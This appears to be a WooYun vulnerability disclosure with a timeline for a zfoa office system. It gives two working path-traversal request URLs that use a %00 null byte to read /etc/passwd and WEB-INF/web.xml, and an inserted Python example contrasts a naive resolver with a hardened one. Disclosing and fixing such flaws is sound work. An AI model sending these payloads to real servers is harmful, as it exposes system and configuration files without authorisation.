WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online viewer -------- http://drop.zone.ci/
2015-11-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-12-23: The vendor has actively ignored the vulnerability; details are disclosed to the public.
An accidental find~~
While playing around with security I happened to find a file download link through a Google search; on closer inspection it turned out to be a zfoa system.
After URL-decoding and constructing the request, I found that as long as the path is truncated, any file can be downloaded. Cases:
1#:
http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00
2#:
**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00
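The root cause described above (a NUL byte cutting the path short so the `..` segments walk out of the document directory) next to a hardened resolver, as an added Python example that is not part of this report or of the zfoa product. The appended suffix, the record-id format and the document root are assumptions; only the `htwj_recordid` payload is taken from the report.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Hypothetical values: the report shows no server-side code, only that %00 in
# htwj_recordid truncates the path and lets "../" escape the document directory.
DOC_SUFFIX = ".html"                                # assumed suffix appended to the id
RECORD_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")   # assumed shape of a legitimate id
PASSWD_PAYLOAD = "../../../../../../../../../../.././../etc/passwd%00"  # from the report


def naive_resolve(base_dir: str, record_id_param: str) -> str:
    """Vulnerable pattern: decode the parameter, append the suffix, and hand the
    string to a filesystem API that stops at the first NUL byte. The suffix is
    silently dropped and the '..' segments leave base_dir."""
    decoded = unquote(record_id_param) + DOC_SUFFIX
    as_seen_by_os = decoded.split("\x00", 1)[0]     # C-string truncation
    return os.path.normpath(os.path.join(base_dir, as_seen_by_os))


def safe_resolve(base_dir: str, record_id_param: str) -> Optional[str]:
    """Hardened resolver: reject NUL bytes, accept only the expected id shape, and
    confirm the canonical path is still inside base_dir (defence in depth in case
    the allowlist is later loosened). Returns None so the caller can answer
    400/404 without touching the filesystem."""
    decoded = unquote(record_id_param)
    if "\x00" in decoded:
        return None
    if not RECORD_ID_RE.fullmatch(decoded):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded + DOC_SUFFIX))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/zfoa/docs"                                  # constructed document root
    print("naive:", naive_resolve(base, PASSWD_PAYLOAD))     # /etc/passwd
    print("safe :", safe_resolve(base, PASSWD_PAYLOAD))      # None
    print("safe :", safe_resolve(base, "20151108_001"))      # /srv/zfoa/docs/20151108_001.html
```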
Unable to contact the vendor, or the vendor actively refused.